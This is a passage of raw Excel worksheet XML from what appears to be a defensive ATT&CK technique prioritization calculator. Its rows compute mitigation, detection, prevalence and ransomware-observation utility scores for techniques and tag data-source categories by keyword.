        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M446" s="37">
        <v>0</v>
      </c>
      <c r="N446" s="56">
        <v>2</v>
      </c>
      <c r="O446" s="56">
        <v>4</v>
      </c>
      <c r="P446" s="56">
        <v>3</v>
      </c>
      <c r="Q446" s="56">
        <v>1</v>
      </c>
      <c r="R446" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S446" s="57">
        <v>8</v>
      </c>
      <c r="T446" s="57" t="s">
        <v>1555</v>
      </c>
      <c r="U446" s="57">
        <v>13</v>
      </c>
      <c r="V446" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24761895238095238</v>
      </c>
      <c r="W446" s="37">
        <v>21</v>
      </c>
      <c r="X446" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y446" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z446" s="37">
        <v>10</v>
      </c>
      <c r="AA446" s="37">
        <v>0.1</v>
      </c>
      <c r="AB446" s="37">
        <v>0.1</v>
      </c>
      <c r="AC446" s="37"/>
      <c r="AD446" s="50" t="s">
        <v>1566</v>
      </c>
      <c r="AE446" s="37" t="str" cm="1">
        <f t="array" ref="AE446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD446)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF446" s="37">
        <v>442</v>
      </c>
      <c r="AG446" s="37" t="str" cm="1">
        <f t="array" ref="AG446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD446)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH446" s="37">
        <v>442</v>
      </c>
      <c r="AI446" s="37" t="str" cm="1">
        <f t="array" ref="AI446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD446)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ446" s="37">
        <v>442</v>
      </c>
      <c r="AK446" s="37" t="str" cm="1">
        <f t="array" ref="AK446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL446" s="37">
        <v>442</v>
      </c>
      <c r="AM446" s="37" t="str" cm="1">
        <f t="array" ref="AM446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN446" s="37">
        <v>0</v>
      </c>
      <c r="AO446" s="37">
        <v>0</v>
      </c>
      <c r="AP446" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ446" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>204.97930892063494</v>
      </c>
      <c r="AR446" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS446" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT446" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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47" spans="1:47" ht="51">
      <c r="A447" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B447" s="37">
        <f t="shared" si="6"/>
        <v>726.0857987142856</v>
      </c>
      <c r="C447" s="37" t="s">
        <v>1567</v>
      </c>
      <c r="D447" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E447" s="37" t="s">
        <v>1568</v>
      </c>
      <c r="F447" s="37">
        <v>1</v>
      </c>
      <c r="G447" s="37">
        <v>1</v>
      </c>
      <c r="H447" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I447" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J447" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K447" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L447" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M447" s="37">
        <v>0</v>
      </c>
      <c r="N447" s="56">
        <v>0</v>
      </c>
      <c r="O447" s="56">
        <v>0</v>
      </c>
      <c r="P447" s="56">
        <v>3</v>
      </c>
      <c r="Q447" s="56">
        <v>6</v>
      </c>
      <c r="R447" s="57" t="s">
        <v>1569</v>
      </c>
      <c r="S447" s="57">
        <v>11</v>
      </c>
      <c r="T447" s="57" t="s">
        <v>1570</v>
      </c>
      <c r="U447" s="57">
        <v>17</v>
      </c>
      <c r="V447" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30952385714285713</v>
      </c>
      <c r="W447" s="37">
        <v>28</v>
      </c>
      <c r="X447" s="37">
        <v>0.50909099999999996</v>
      </c>
      <c r="Y447" s="37">
        <v>0.50909099999999996</v>
      </c>
      <c r="Z447" s="37">
        <v>9</v>
      </c>
      <c r="AA447" s="37">
        <v>0.09</v>
      </c>
      <c r="AB447" s="37">
        <v>0.09</v>
      </c>
      <c r="AC447" s="37"/>
      <c r="AD447" s="50" t="s">
        <v>1571</v>
      </c>
      <c r="AE447" s="37" t="str" cm="1">
        <f t="array" ref="AE447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD447)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF447" s="37">
        <v>443</v>
      </c>
      <c r="AG447" s="37" t="str" cm="1">
        <f t="array" ref="AG447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH447" s="37">
        <v>443</v>
      </c>
      <c r="AI447" s="37" t="str" cm="1">
        <f t="array" ref="AI447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD447)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ447" s="37">
        <v>443</v>
      </c>
      <c r="AK447" s="37" t="str" cm="1">
        <f t="array" ref="AK447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL447" s="37">
        <v>443</v>
      </c>
      <c r="AM447" s="37" t="str" cm="1">
        <f t="array" ref="AM447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD447)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN447" s="37">
        <v>0</v>
      </c>
      <c r="AO447" s="37">
        <v>1</v>
      </c>
      <c r="AP447" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ447" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>242.02859957142854</v>
      </c>
      <c r="AR447" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS447" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT447" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU44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5.7863952278911546</v>
      </c>
    </row>
    <row r="448" spans="1:47" ht="34">
      <c r="A448" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B448" s="37">
        <f t="shared" si="6"/>
        <v>499.25229633333339</v>
      </c>
      <c r="C448" s="37" t="s">
        <v>1572</v>
      </c>
      <c r="D448" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E448" s="37" t="s">
        <v>1573</v>
      </c>
      <c r="F448" s="37">
        <v>1</v>
      </c>
      <c r="G448" s="37">
        <v>1</v>
      </c>
      <c r="H448" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I448" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J448" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K448" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L448" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M448" s="37">
        <v>0</v>
      </c>
      <c r="N448" s="56">
        <v>0</v>
      </c>
      <c r="O448" s="56">
        <v>0</v>
      </c>
      <c r="P448" s="56">
        <v>0</v>
      </c>
      <c r="Q448" s="56">
        <v>6</v>
      </c>
      <c r="R448" s="57" t="s">
        <v>596</v>
      </c>
      <c r="S448" s="57">
        <v>10</v>
      </c>
      <c r="T448" s="57" t="s">
        <v>1574</v>
      </c>
      <c r="U448" s="57">
        <v>6</v>
      </c>
      <c r="V448" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095233333333333</v>
      </c>
      <c r="W448" s="37">
        <v>16</v>
      </c>
      <c r="X448" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y448" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z448" s="37">
        <v>6</v>
      </c>
      <c r="AA448" s="37">
        <v>0.06</v>
      </c>
      <c r="AB448" s="37">
        <v>0.06</v>
      </c>
      <c r="AC448" s="37"/>
      <c r="AD448" s="50" t="s">
        <v>1575</v>
      </c>
      <c r="AE448" s="37" t="str" cm="1">
        <f t="array" ref="AE448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF448" s="37">
        <v>444</v>
      </c>
      <c r="AG448" s="37" t="str" cm="1">
        <f t="array" ref="AG448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD448)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH448" s="37">
        <v>444</v>
      </c>
      <c r="AI448" s="37" t="str" cm="1">
        <f t="array" ref="AI448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ448" s="37">
        <v>444</v>
      </c>
      <c r="AK448" s="37" t="str" cm="1">
        <f t="array" ref="AK448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL448" s="37">
        <v>444</v>
      </c>
      <c r="AM448" s="37" t="str" cm="1">
        <f t="array" ref="AM448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN448" s="37">
        <v>0</v>
      </c>
      <c r="AO448" s="37">
        <v>0</v>
      </c>
      <c r="AP448" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ448" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>166.41743211111114</v>
      </c>
      <c r="AR448" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS448" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT448" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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49" spans="1:47" ht="34">
      <c r="A449" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B449" s="37">
        <f t="shared" si="6"/>
        <v>449.49039138095242</v>
      </c>
      <c r="C449" s="37" t="s">
        <v>1576</v>
      </c>
      <c r="D449" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E449" s="37" t="s">
        <v>1577</v>
      </c>
      <c r="F449" s="37">
        <v>1</v>
      </c>
      <c r="G449" s="37">
        <v>1</v>
      </c>
      <c r="H449" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I449" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J449" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K449" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L449" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M449" s="37">
        <v>0</v>
      </c>
      <c r="N449" s="56">
        <v>0</v>
      </c>
      <c r="O449" s="56">
        <v>0</v>
      </c>
      <c r="P449" s="56">
        <v>0</v>
      </c>
      <c r="Q449" s="56">
        <v>0</v>
      </c>
      <c r="R449" s="57" t="s">
        <v>1578</v>
      </c>
      <c r="S449" s="57">
        <v>10</v>
      </c>
      <c r="T449" s="57" t="s">
        <v>1574</v>
      </c>
      <c r="U449" s="57">
        <v>6</v>
      </c>
      <c r="V449" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238090476190475</v>
      </c>
      <c r="W449" s="37">
        <v>16</v>
      </c>
      <c r="X449" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y449" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z449" s="37">
        <v>0</v>
      </c>
      <c r="AA449" s="37">
        <v>0</v>
      </c>
      <c r="AB449" s="37">
        <v>0</v>
      </c>
      <c r="AC449" s="37"/>
      <c r="AD449" s="50" t="s">
        <v>1579</v>
      </c>
      <c r="AE449" s="37" t="str" cm="1">
        <f t="array" ref="AE449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD449)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF449" s="37">
        <v>445</v>
      </c>
      <c r="AG449" s="37" t="str" cm="1">
        <f t="array" ref="AG449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH449" s="37">
        <v>445</v>
      </c>
      <c r="AI449" s="37" t="str" cm="1">
        <f t="array" ref="AI449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ449" s="37">
        <v>445</v>
      </c>
      <c r="AK449" s="37" t="str" cm="1">
        <f t="array" ref="AK449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD449)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL449" s="37">
        <v>445</v>
      </c>
      <c r="AM449" s="37" t="str" cm="1">
        <f t="array" ref="AM449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN449" s="37">
        <v>0</v>
      </c>
      <c r="AO449" s="37">
        <v>0</v>
      </c>
      <c r="AP449" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ449" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>149.83013046031746</v>
      </c>
      <c r="AR449" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS449" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT449" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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50" spans="1:47" ht="68">
      <c r="A450" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B450" s="37">
        <f t="shared" si="6"/>
        <v>187</v>
      </c>
      <c r="C450" s="37" t="s">
        <v>1580</v>
      </c>
      <c r="D450" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E450" s="37" t="s">
        <v>1581</v>
      </c>
      <c r="F450" s="37">
        <v>1</v>
      </c>
      <c r="G450" s="37">
        <v>1</v>
      </c>
      <c r="H450" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I450" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J450" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K450" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L450" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M450" s="37">
        <v>0</v>
      </c>
      <c r="N450" s="56">
        <v>0</v>
      </c>
      <c r="O450" s="56">
        <v>1</v>
      </c>
      <c r="P450" s="56">
        <v>0</v>
      </c>
      <c r="Q450" s="56">
        <v>0</v>
      </c>
      <c r="R450" s="57"/>
      <c r="S450" s="57">
        <v>0</v>
      </c>
      <c r="T450" s="57" t="s">
        <v>1582</v>
      </c>
      <c r="U450" s="57">
        <v>0</v>
      </c>
      <c r="V450" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W450" s="37">
        <v>0</v>
      </c>
      <c r="X450" s="37">
        <v>0</v>
      </c>
      <c r="Y450" s="37">
        <v>0</v>
      </c>
      <c r="Z450" s="37">
        <v>1</v>
      </c>
      <c r="AA450" s="37">
        <v>0.01</v>
      </c>
      <c r="AB450" s="37">
        <v>0.01</v>
      </c>
      <c r="AC450" s="37"/>
      <c r="AD450" s="50" t="s">
        <v>1324</v>
      </c>
      <c r="AE450" s="37" t="str" cm="1">
        <f t="array" ref="AE450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD450)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF450" s="37">
        <v>446</v>
      </c>
      <c r="AG450" s="37" t="str" cm="1">
        <f t="array" ref="AG450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH450" s="37">
        <v>446</v>
      </c>
      <c r="AI450" s="37" t="str" cm="1">
        <f t="array" ref="AI450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD450)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ450" s="37">
        <v>446</v>
      </c>
      <c r="AK450" s="37" t="str" cm="1">
        <f t="array" ref="AK450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL450" s="37">
        <v>446</v>
      </c>
      <c r="AM450" s="37" t="str" cm="1">
        <f t="array" ref="AM450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN450" s="37">
        <v>0</v>
      </c>
      <c r="AO450" s="37">
        <v>1</v>
      </c>
      <c r="AP450" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ450" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>62.333333333333336</v>
      </c>
      <c r="AR450" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS450" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT450" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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1.5079365079365079</v>
      </c>
    </row>
    <row r="451" spans="1:47" ht="34">
      <c r="A451" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B451" s="37">
        <f t="shared" si="6"/>
        <v>178.9</v>
      </c>
      <c r="C451" s="37" t="s">
        <v>1583</v>
      </c>
      <c r="D451" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E451" s="37" t="s">
        <v>1584</v>
      </c>
      <c r="F451" s="37">
        <v>1</v>
      </c>
      <c r="G451" s="37">
        <v>1</v>
      </c>
      <c r="H451" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I451" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J451" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K451" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L451" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M451" s="37">
        <v>0</v>
      </c>
      <c r="N451" s="56">
        <v>0</v>
      </c>
      <c r="O451" s="56">
        <v>0</v>
      </c>
      <c r="P451" s="56">
        <v>0</v>
      </c>
      <c r="Q451" s="56">
        <v>0</v>
      </c>
      <c r="R451" s="57"/>
      <c r="S451" s="57">
        <v>0</v>
      </c>
      <c r="T451" s="57" t="s">
        <v>1585</v>
      </c>
      <c r="U451" s="57">
        <v>0</v>
      </c>
      <c r="V451" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W451" s="37">
        <v>0</v>
      </c>
      <c r="X451" s="37">
        <v>0</v>
      </c>
      <c r="Y451" s="37">
        <v>0</v>
      </c>
      <c r="Z451" s="37">
        <v>0</v>
      </c>
      <c r="AA451" s="37">
        <v>0</v>
